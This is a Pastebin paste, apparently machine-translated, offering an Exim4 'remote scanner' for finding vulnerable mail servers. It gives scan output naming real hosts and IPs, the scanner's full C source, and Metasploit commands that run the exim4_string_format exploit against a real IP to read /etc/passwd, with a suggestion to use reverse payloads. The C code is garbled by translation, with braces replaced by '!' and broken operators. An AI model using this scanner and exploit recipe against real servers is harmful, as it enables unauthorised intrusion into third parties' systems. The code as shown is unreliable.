API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 26th, 2017
56
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.15 KB | None | 0 0
raw download clone embed print report
  1. Exim Remote Scanner nood Server
  2.  
  3. Peace and mercy of God be upon
  4.  
  5.  
  6. A simple tool that can be known for some Exim Remote Scanner nood Server
  7.  
  8.  
  9. Examination of its servers by the network
  10. "Abu so-called hyper or when some Nud"
  11. Of the gap exim stmp
  12.  
  13.  
  14.  
  15. Code:
  16.  
  17.  
  18.  
  19. . / Exim_scan-s 80.237.132.33-e 80.237.255.255-t 20-n 50-p 25-l sec4ever.txt
  20. Exim4 remote Scanner.
  21.  
  22. Set highest priority
  23. Set Max open files to: 1024
  24. Set Logfile: sec4ever.txt
  25. Scan start: 31711 hosts, 50 threads ...
  26.  
  27. -------------------------------------------------- --------------
  28. 80.237.141.10 220 srv05.tj-edv.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:17:22 +0100
  29. 80.237.145.35 220 mail.dalailama-hamburg.de ESMTP exim 4.50 Fri, 24 Dec 2010 12:20:50 +0100
  30. 80.237.153.41 220-server.event-it-store.de ESMTP exim 4.69 # 1 Fri, 24 Dec 2010 12:26:46 +0100
  31. 80.237.154.40 220 portabox.local.com ESMTP exim 4.68 Fri, 24 Dec 2010 11:27:01 +0000
  32. 80.237.154.66 220 mm1.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:27:09 +0100
  33. 80.237.154.117 220 ds80-237-154-117.dedicated.hosteurope.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:10 +0100
  34. 80.237.155.85 220 qsmirror01.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
  35. 80.237.155.86 220 qsmirror02.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
  36. 80.237.157.25 220 secksie.org ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:54 +0100
  37. 80.237.157.45 220 server.mfkom.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:59 +0100
  38. 80.237.157.97 220 de1.coguan.com ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:17 +0100
  39. 80.237.158.89 220 sester.sidebysite.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:18 +0100
  40. 80.237.158.37 220 homer.pl ESMTP exim 4.69 Fri, 24 Dec 2010 12:25:40 +0100
  41. 80.237.158.45 220 mm2.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:19 +0100
  42. 80.237.159.54 220 jugene.betalounge.com ESMTP exim 4.69 Fri, 24 Dec 2010 12:28:39 +0100
  43. 80.237.162.171 220 familie-deden.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:49 +0100
  44.  
  45.  
  46. On File
  47.  
  48.  
  49. Code PHP:
  50.  
  51. / *
  52. * For Linux:
  53. * Gcc-o exim_scan exim_scan.c-O3-Wall-pipe-DLinux-lpthread
  54. * For FreeBSD:
  55. * Gcc-o exim_scan exim_scan.c-O3-Wall-pipe-lpthread
  56. * /
  57. # Include <stdio.h>
  58. # Include <unistd.h>
  59. # Include <stdarg.h>
  60. # Include <sys/types.h>
  61. # Include <sys/wait.h>
  62. # Include <sys/socket.h>
  63. # Include <netinet/in.h>
  64. # Include <netinet/tcp.h>
  65. # Include <sys/resource.h>
  66. # Include <arpa/inet.h>
  67. # Include <netdb.h>
  68. # Include <stdlib.h>
  69. # Include <errno.h>
  70. # Include <signal.h>
  71. # Include <string.h>
  72. # Include <assert.h>
  73. # Include <poll.h>
  74. # Include <fcntl.h>
  75. # Include <sys/time.h>
  76. # Include <pthread.h>
  77. # Include <regex.h>
  78.  
  79. # Define TIMEOUT 10
  80. # Define MAXHOSTS 0x7fffffff
  81. # Define THREADS 256
  82.  
  83. # Ifdef Linux
  84. / *
  85. * Normal data may be read.
  86. * /
  87. # Define POLLRDNORM 0x040
  88. # Endif
  89.  
  90. /////////////////////////////// .... ///////////////////////////////////////
  91.  
  92. static FILE * output = NULL;
  93. extern int errno;
  94. static char * start = NULL; / * start host * /
  95. static char * end = NULL; / * end host * /
  96. static int port = 25;
  97. / * Number of IP will be scanned * /
  98. static int totnum = 0;
  99. / * Thread id * /
  100. static pthread_t tid;
  101. static int inum = 0;
  102. / * Start time * /
  103. static time_t t1, t2;
  104. / * Number of threads * /
  105. static int thdnum = THREADS;
  106. / * Current number of threads * /
  107. static int curnum = 0;
  108. static int timeout = TIMEOUT;
  109. / * Mutex lock for 'curnum' * /
  110. static pthread_mutex_t mutex_curnum = PTHREAD_MUTEX_INITIALIZER;
  111. / * Cond for curnum * /
  112. static pthread_cond_t cond_curnum = PTHREAD_COND_INITIALIZER;
  113.  
  114. static void terminate (void)
  115. {
  116. if (output! = stdout) {
  117. fclose (output);
  118. output = stdout;
  119. !
  120. _exit (EXIT_SUCCESS);
  121. !
  122.  
  123. static void on_terminate (int signo)
  124. {
  125. time_t t2 = time (NULL);
  126. fprintf (stderr, "--------------------------------------------- ------------------- \ n \ n ");
  127. fprintf (stderr, "Receive SIG NUM:% d% d /% d hosts,% lu secs,% ld hosts / sec. \ n", signo, inum + 1,
  128. totnum, t2-t1, (inum +1) / (t2-t1));
  129. pthread_mutex_destroy (& mutex_curnum);
  130. pthread_cond_destroy (& cond_curnum);
  131. exit (EXIT_SUCCESS);
  132. } / * End of on_terminate * /
  133.  
  134. static void on_sigchld (int signo)
  135. {
  136. pid_t pid;
  137. int status;
  138.  
  139. while ((pid = waitpid (-1, & status, WNOHANG))> 0) {
  140. fprintf (stderr, "child <% u> terminated", (unsigned int) pid);
  141. } / * End of while * /
  142. return;
  143. } / * End of on_sigchld * /
  144.  
  145. / *
  146. * .......
  147. * /
  148. static void init_signal (void)
  149. {
  150. unsigned int i;
  151.  
  152. atexit (terminate);
  153. for (i = 1; i <9; i + +) {
  154. signal (i, on_terminate);
  155. !
  156. signal (SIGTERM, on_terminate);
  157. signal (SIGALRM, on_terminate);
  158. signal (SIGCHLD, on_sigchld);
  159. return;
  160. } / * End of init_signal * /
  161.  
  162. / * New:
  163. * Tcp connect with no block socket, host to ip.
  164. * Millisecond timeout, it's will be fast.
  165. *; D
  166. * 2003/06/23 add by Sam
  167. * /
  168.  
  169. static int tcpConnect (const char * ip, unsigned int port, unsigned int timeout)
  170. {
  171. int sock, flag, pe = 0;
  172. size_t pe_len;
  173. fd_set rset;
  174. struct timeval tv;
  175. struct sockaddr_in addr;
  176.  
  177. sock = socket (AF_INET, SOCK_STREAM, 0);
  178. if (-1 == sock) {
  179. perror ("tcpConnect: socket \ n");
  180. return -1;
  181. !
  182.  
  183. addr.sin_addr.s_addr = inet_addr (ip);
  184. addr.sin_family = AF_INET;
  185. addr.sin_port = htons (port);
  186.  
  187.  
  188. flag = fcntl (sock, F_GETFL);
  189. if (-1 == flag) {
  190. perror ("tcpConnect: fcntl \ n");
  191. close (sock);
  192. return -1;
  193. !
  194.  
  195. flag | = O_NONBLOCK;
  196. if (fcntl (sock, F_SETFL, flag) <0) {
  197. perror ("tcpConnect: fcntl \ n");
  198. close (sock);
  199. return -1;
  200. !
  201.  
  202. if (connect (sock, (const struct sockaddr *) & addr,
  203. sizeof (addr)) <0 & &
  204. errno! = EINPROGRESS) {
  205. close (sock);
  206. return -1;
  207. !
  208.  
  209.  
  210. tv.tv_sec = timeout/1000;
  211. tv.tv_usec = timeout% 1000;
  212.  
  213. FD_ZERO (& rset);
  214. FD_SET (sock, & rset);
  215.  
  216. if (select (sock +1, & rset, & rset, NULL, & tv) <= 0) {
  217. close (sock);
  218. return -1;
  219. !
  220.  
  221. pe_len = sizeof (pe);
  222.  
  223. if (getsockopt (sock, SOL_SOCKET, SO_ERROR, & pe, & pe_len) <0) {
  224. perror ("tcpConnect: getsockopt \ n");
  225. close (sock);
  226. return -1;
  227. !
  228.  
  229. if (pe! = 0) {
  230. errno = pe;
  231. close (sock);
  232. return -1;
  233. !
  234.  
  235. if (fcntl (sock, F_SETFL, flag & ~ O_NONBLOCK) <0) {
  236. perror ("tcpConnect: fcntl \ n");
  237. close (sock);
  238. return -1;
  239. !
  240. pe = 1;
  241.  
  242. if (setsockopt (sock, SOL_SOCKET, SO_KEEPALIVE, & pe, pe_len) <0) {
  243. perror ("tcpConnect: setsockopt \ n");
  244. close (sock);
  245. return -1;
  246. !
  247.  
  248.  
  249. return sock;
  250. !
  251.  
  252. static void check_exim (char * host)
  253. {
  254. int sock, retval, i;
  255. unsigned char buff [1024], resp [512], errbuf [1024];
  256. struct pollfd fds [1];
  257. regex_t re;
  258. regmatch_t subs [10];
  259. char * pattern = "Exim 4 \ \. [0-6] [0-9]";
  260.  
  261. retval = regcomp (& re, pattern, REG_EXTENDED);
  262. if (retval) {
  263. regerror (retval, & re, errbuf, sizeof (errbuf));
  264. / / Printf ("error: regcomp:% s \ n", errbuf);
  265. goto nonssl_out;
  266. !
  267. / *
  268. * Net connect
  269. * /
  270. if ((sock = tcpConnect (host, port, (timeout - timeout / 2) * 1000)) <= 0) {
  271. retval = 0;
  272. goto nonssl_out;
  273. !
  274.  
  275. fds [0]. fd = sock;
  276. fds [0]. events = POLLRDNORM;
  277.  
  278. / *
  279. * Set poll timeout (usec)
  280. * /
  281. retval = poll (fds, 1, (timeout - timeout / 2) * 1000);
  282. if (retval <= 0) {
  283. goto nonssl_out;
  284. !
  285.  
  286. if (fds [0]. revents & POLLRDNORM) {
  287. retval = read (sock, resp, sizeof (resp));
  288. if (retval <= 0) {
  289. goto nonssl_out;
  290. !
  291.  
  292. for (i = 0; i <retval; i + +) {
  293. if (resp [i] == '\ r' | | resp [i] == '\ n') {
  294. resp [i] ='';
  295. !
  296. !
  297.  
  298. retval = regexec (& re, resp, 10, subs, 0);
  299. if (retval == REG_NOMATCH) goto nonssl_out;
  300. else if (retval! = 0) {
  301. regerror (retval, & re, errbuf, sizeof (errbuf));
  302. / / Printf ("error: regexec:% s \ n", errbuf);
  303. goto nonssl_out;
  304. !
  305. / / Matched
  306. if (output! = stdout) {
  307. fprintf (stderr, "%-40s% s \ n", host, resp); / / also output in console.
  308. !
  309. fprintf (output, "%-40s% s \ n", host, resp);
  310. goto nonssl_out;
  311. !
  312.  
  313. nonssl_out:
  314. if (sock) {
  315. close (sock);
  316. sock = -1;
  317. !
  318.  
  319. regfree (& re);
  320. return;
  321. !
  322.  
  323.  
  324.  
  325. static void * init_scan (void * arg)
  326. {
  327. pthread_t thread_id;
  328. / *
  329. * There some signal code ripped from scz's code
  330. * /
  331. sigset_t signal_mask;
  332.  
  333. thread_id = pthread_self ();
  334. if (0! = sigfillset (& signal_mask)) {
  335. fprintf (stderr, "sigfillset error in thread [% u] \ n", (unsigned int) thread_id);
  336. exit (EXIT_FAILURE);
  337. !
  338. / *
  339. * ........
  340. * /
  341. if (0! = sigprocmask (SIG_BLOCK, & signal_mask, NULL)) {
  342. fprintf (stderr, "sigprocmask error in thread [% u] \ n", (unsigned int) thread_id);
  343. exit (EXIT_FAILURE);
  344. !
  345.  
  346. pthread_detach (thread_id);
  347. check_exim (arg);
  348.  
  349.  
  350. # If 0
  351. fprintf (stderr, "% d: scan% s \ n", pthread_self (), arg);
  352. # Endif
  353.  
  354. free (arg);
  355.  
  356. pthread_mutex_lock (& ​​mutex_curnum);
  357. curnum -;
  358. pthread_cond_broadcast (& cond_curnum);
  359. pthread_mutex_unlock (& ​​mutex_curnum);
  360.  
  361. return NULL;
  362. !
  363.  
  364. / *
  365. * Print usage messages
  366. * /
  367. static void usage (char * s)
  368. {
  369. fprintf (stderr, "Usage:% s [-s startip] [-e endip] [-t timeout] [-n maxthreadnum] [-p port: 25] [-l logfile] [-h?] \ n \ n ", s);
  370. !
  371.  
  372. int main (int argc, char * argv [])
  373. {
  374. int i;
  375. struct rlimit rl;
  376. struct in_addr current_ip; / * current ip * /
  377. struct in_addr final_ip; / * last ip to scan * /
  378. char * host, * file = ". / exim.ips";
  379.  
  380. fprintf (stderr, "Exim4 Remote Scanner. \ n \ n");
  381.  
  382. while ((i = getopt (argc, argv, "h?: s: e: t: n: p: l:"))! = EOF) {
  383. switch (i) {
  384. case 's':
  385. start = strdup (optarg);
  386. if (! inet_aton (start, & current_ip)) {
  387. fprintf (stderr, "invalid IP address:% s \ n", start);
  388. return -1;
  389. !
  390. break;
  391. case 'e':
  392. end = strdup (optarg);
  393. if (! inet_aton (end, & final_ip)) {
  394. fprintf (stderr, "invalid IP address:% s \ n", end);
  395. return -1;
  396. !
  397. break;
  398. case 't':
  399. timeout = atoi (optarg);
  400. break;
  401. case 'n':
  402. thdnum = atoi (optarg);
  403. break;
  404. case 'p':
  405. port = atoi (optarg);
  406. break;
  407. case 'l':
  408. file = strdup (optarg);
  409. break;
  410. case 'h':
  411. case '?':
  412. usage (argv [0]);
  413. exit (EXIT_FAILURE);
  414. !
  415. !
  416.  
  417. if (start == NULL & & end == NULL) {
  418. usage (argv [0]);
  419. exit (EXIT_FAILURE);
  420. !
  421.  
  422. init_signal ();
  423. / * Set highest priority * /
  424. if (! geteuid ()) {
  425. fprintf (stderr, "Set highest priority \ n");
  426. setpriority (PRIO_PROCESS, 0, -20);
  427. !
  428.  
  429. / * Raise number of open files * /
  430. if (! getrlimit (RLIMIT_NOFILE, & rl)) {
  431. fprintf (stderr, "Set Max open files to:% d \ n", (int) rl.rlim_max);
  432. rl.rlim_cur = rl.rlim_max;
  433. setrlimit (RLIMIT_NOFILE, & rl);
  434. !
  435.  
  436. if (thdnum + 10> rl.rlim_cur) {
  437. thdnum = rl.rlim_cur - 10;
  438. fprintf (stderr, "Too many threads, set threads number to% d \ n", thdnum);
  439. !
  440.  
  441. totnum = (ntohl (final_ip.s_addr) - ntohl (current_ip.s_addr)) + 1;
  442.  
  443. if (totnum> MAXHOSTS) {
  444. fprintf (stderr, "Too may hosts, MAX hosts:% d \ n", MAXHOSTS);
  445. exit (EXIT_FAILURE);
  446. !
  447.  
  448. output = stdout;
  449.  
  450. if (file! = NULL) {
  451. fprintf (stderr, "Set Logfile:% s \ n", file);
  452. if ((output = fopen (file, "w +")) == NULL) {
  453. fprintf (stderr, "Error in open Logfile% s:% s \ n", file, strerror (errno));
  454. return (EXIT_FAILURE);
  455. !
  456. !
  457.  
  458. fprintf (stderr, "Scan start:% d hosts,% d threads ... \ n \ n", totnum, thdnum);
  459. fprintf (stderr, "--------------------------------------------- ------------------- \ n ");
  460.  
  461. t1 = time (NULL);
  462. for (inum = 0; inum <totnum; inum + +) {
  463. host = calloc (16, 1);
  464. if (host == NULL) {
  465. fprintf (stderr, "No memory left \ n");
  466. return -1;
  467. !
  468. sprintf (host, "% s", inet_ntoa (current_ip));
  469. current_ip.s_addr = htonl (ntohl (current_ip.s_addr) +1);
  470.  
  471. pthread_mutex_lock (& ​​mutex_curnum);
  472. if (curnum> = thdnum) {
  473. pthread_cond_wait (& cond_curnum, & mutex_curnum);
  474. !
  475. curnum + +;
  476. pthread_mutex_unlock (& ​​mutex_curnum);
  477. / *
  478. * ..........
  479. * /
  480. if (pthread_create (& tid, NULL, (void *) init_scan, (void *) host)! = 0) {
  481. fprintf (stderr, "pthread_create:% s \ n", strerror (errno));
  482. exit (EXIT_FAILURE);
  483. !
  484. !
  485.  
  486.  
  487. pthread_mutex_lock (& ​​mutex_curnum);
  488. while (curnum> 0) {
  489. pthread_cond_wait (& cond_curnum, & mutex_curnum);
  490. !
  491. pthread_mutex_unlock (& ​​mutex_curnum);
  492.  
  493. t2 = time (NULL);
  494.  
  495. fprintf (stderr, "--------------------------------------------- ------------------- \ n ");
  496. fprintf (stderr, "\ nScan completed,% ld sec", t2-t1);
  497. if (t2 - t1)
  498. fprintf (stderr, "% ld hosts / sec. \ n", totnum / (t2-t1));
  499. else
  500. fprintf (stderr, "\ n");
  501.  
  502. pthread_mutex_destroy (& mutex_curnum);
  503. pthread_cond_destroy (& cond_curnum);
  504. return (EXIT_SUCCESS);
  505. !
  506. As for the exploitation of a loophole
  507.  
  508.  
  509. Code PHP:
  510.  
  511. use exploit/unix/smtp/exim4_string_format
  512.  
  513. set rhost 80.237.132.33
  514.  
  515. set payload cmd / unix / generic
  516.  
  517. set CMD 'cat / etc / passwd'
  518. And you can change Albailoud to the touch and Reverse Albailoudat many Exim Remote Scanner nood Server
  519.  
  520.  
  521.  
  522. The latter rights reserved for a guest
  523.  
  524. Source
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!